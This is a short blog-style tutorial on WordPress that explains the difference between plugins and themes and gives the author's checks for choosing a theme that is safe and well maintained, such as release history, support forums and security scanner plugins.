WordPress is provided as an open-source downloadable package, often called WordPress core. WordPress is extensible, meaning that this core can be extended by additional code. The easiest way to do this is to download and install plugins and themes.
There are other ways, such as rewriting core code files, but these are not considered good practice. In generally we want to leave the core code alone. Why? Themes and plugins are two mechanisms that have been provided to extend WordPress in “official ways”. This safeguards the core code and also means that changes don’t get overwritten during updates.
Does that mean that themes and plugins are always safe and work well? Not necessarily, as these are just more PHP (and maybe some CSS and javascript) a number of things could be the case. They could be poorly written, they may conflict with one another or WordPress core, or the developer could have malicious intent.
Themes vs plugins
So, if themes and plugins are further packages of PHP and maybe CSS and Javascript, what is the difference between them? Well, the difference is somewhat artificial is a matter of role and usage.
Philosophically speaking, and this is a basic tenet at WordPress.org, Plugins are for adding functionality and Themes are for controlling rendering, layout and visual presentation. In that sense, Themes, although they contain PHP, CSS and JS, play the same role in WordPress as CSS plays in the browser.
Practically the lines blur though, PHP is PHP and you can put most things in a theme that you can put in a plugin (almost, load order factors intervene). In fact, many commercial themes are packed full of functionality in one ‘convenient’ bundle for users. Typically they have market slogans such as “the only theme you’ll ever need” which really means “once you start using it you are basically locked in and can’t switch to another theme.”
The test I use is this. If changing from theme Whizbang to theme Looksgood will result in a loss of functionality then I won’t use theme Whizbang. I’ll look to a plugin to provide that functionality.
Common types of functionality that are slipped into themes are things like drag and drop page builders, photo sliders/galleries and custom post types such as portfolio.
What are themes
It is not possible to run WordPress without a theme, if you do nothing about themes then you will run one of the default themes provided with WordPress core. These themes typically are named after the year in which that version of WordPress core was published.
So, for the version current when this was written (4.7.2) the theme is called Twenty Seventeen.
Let’s have a quick look at it and see what it contains.
Selection criteria
I dropped some harbingers of doom a few paragraphs back, how can we be sure themes are well-coded and safe before we use them?
Well, it requires some detective work. I like to see a theme that has been in development for a while and is fairly popular. I look at the release notes and like to see a theme that regularly roots out bugs and maintains version parity with WordPress core. I read the support forums and look for a couple of things: recurring problems and good developer response.
I also like to run two plugins in all sites: Wordfence Security, which is an all-around security plugin and Exploit Scanner which will scan site code looking for exploits.
That’s the short version, but we are hear to talk about child themes.